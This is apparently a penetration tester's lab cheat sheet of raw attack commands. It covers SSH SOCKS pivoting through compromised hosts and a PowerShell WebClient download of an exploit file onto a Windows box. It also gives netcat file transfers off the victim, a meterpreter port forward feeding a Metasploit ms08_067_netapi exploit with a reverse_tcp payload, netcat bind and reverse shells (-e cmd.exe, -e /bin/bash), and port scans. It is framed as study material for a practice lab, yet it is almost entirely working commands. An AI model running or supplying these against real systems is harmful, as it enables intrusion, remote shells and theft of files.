pivoting tunneling
PIVOTING:
box1 (10.11.1.99) -> box2 (10.11.2.2) -> box3 (10.11.3.2) -> box4 (10.11.4.2)
ssh -D 6666 10.11.2.2
- opens SOCKS port 6666 on the local (kali) machine
proxychains firefox (or nmap or whatever)
- brings a firefox browser up
- surf to 10.11.3.2, traffic will go thru 10.11.2.2
proxychains ssh -D 7777 10.11.3.2
- opens SOCKS port 7777 on the local (kali) machine
- surf to 10.11.4.2, traffic will go thru 10.11.2.2 and 10.11.3.2
etc etc etc
also, edit /etc/proxychains.conf so the newest socks entry (127.0.0.1 and the latest -D port) is on top
avoid pivoting through Windows machines
This can also be done through meterpreter
file transfer
###########################################################
put the file in /var/www/html, then start the web server:
systemctl start apache2
###########################################################
To transfer a file to the Windows lab box (pull 18176.py from the kali web server at 10.11.0.81):
$url = "http://10.11.0.81/18176.py"
$output = "C:\users\administrator\18176.py"
$start_time = Get-Date
$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $output)
# OR, as a one-liner:
(New-Object System.Net.WebClient).DownloadFile($url, $output)
###########################################################
To transfer a file to the Windows box:
zip it and grab it thru Internet Explorer
To transfer a file from the Windows box:
kali (receiver): nc -nlvp 4444 > 18176.exe
windows (sender): nc -nv 10.0.0.22 4444 < 18176.exe
###########################################################
port forwarding
in meterpreter:
portfwd add -l 445 -p 445 -r 10.11.1.229
- this portfwd command attaches kali's local port 445 to port 445 on the victim machine (10.11.1.229) through the meterpreter session already running.
msf exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set rhost 127.0.0.1
msf exploit(ms08_067_netapi) > set lport 6666
msf exploit(ms08_067_netapi) > set lhost 10.11.0.81
msf exploit(ms08_067_netapi) > exploit
- this string of commands runs the exploit against the kali box itself (127.0.0.1:445); the portfwd rule carries it to the mail server (10.11.1.229), the reverse_tcp payload calls back to 10.11.0.81:6666 and a prompt comes back.
nc | netcat:
- check TCP port:
nc -nv 10.11.1.7
- set up a listening post
nc -nlvp 4444
- connect to listening post
nc -nv 10.11.0.81 4444
- transfer a file (receiver first, then sender)
nc -nlvp 4444 > incoming.exe
nc -nv 10.11.0.81 4444 < /usr/share/windows-binaries/wget.exe
note: no feedback expected while the file transfers
- bind a shell
nc -nlvp 4444 -e cmd.exe
nc -nv 10.11.0.81 4444
- reverse shell
nc -nlvp 4444
nc -nv 10.0.0.22 4444 -e /bin/bash
- port scanning
nc -nvv -w 1 -z 10.11.1.7 999-1999
nmap -sT -p 1-65535 10.11.1.7